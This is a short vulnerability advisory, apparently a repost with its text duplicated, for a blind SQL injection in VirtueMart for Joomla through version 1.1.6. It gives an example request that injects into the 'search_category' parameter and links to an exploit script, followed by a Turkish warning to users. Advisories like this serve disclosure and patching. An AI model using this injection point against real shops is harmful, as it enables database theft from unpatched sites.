VirtueMart eCommerce for Joomla <= 1.1.6 Blind SQL Injection
Application: VirtueMart
Version affected: <= 1.1.6
Website: http://www.virtuemart.net/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi (at) gmail (dot) com [email concealed]
Web: http://www.andreafabrizi.it
Vuln: Blind SQL Injection
**************************************************************
Blind SQL Injection found in "search_category" parameter.
Example:
http://127.0.0.1/index.php?category_id=&page=shop.browse&option=com_virt
uemart&Itemid=1&keyword1=hand&search_op=and&keyword2=&search_limiter=any
where&search=Search&search_category=3
AND $BLIND_SQL --
EXPLOIT: http://www.andreafabrizi.it/download.php?file=virtuemart_sql_exploit.sh
bu bileşeni kullanların dikkat etmesi gerekiyor
Application: VirtueMart
Version affected: <= 1.1.6
Website: http://www.virtuemart.net/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi (at) gmail (dot) com [email concealed]
Web: http://www.andreafabrizi.it
Vuln: Blind SQL Injection
**************************************************************
Blind SQL Injection found in "search_category" parameter.
Example:
http://127.0.0.1/index.php?category_id=&page=shop.browse&option=com_virt
uemart&Itemid=1&keyword1=hand&search_op=and&keyword2=&search_limiter=any
where&search=Search&search_category=3
AND $BLIND_SQL --
EXPLOIT: http://www.andreafabrizi.it/download.php?file=virtuemart_sql_exploit.sh
bu bileşeni kullanların dikkat etmesi gerekiyor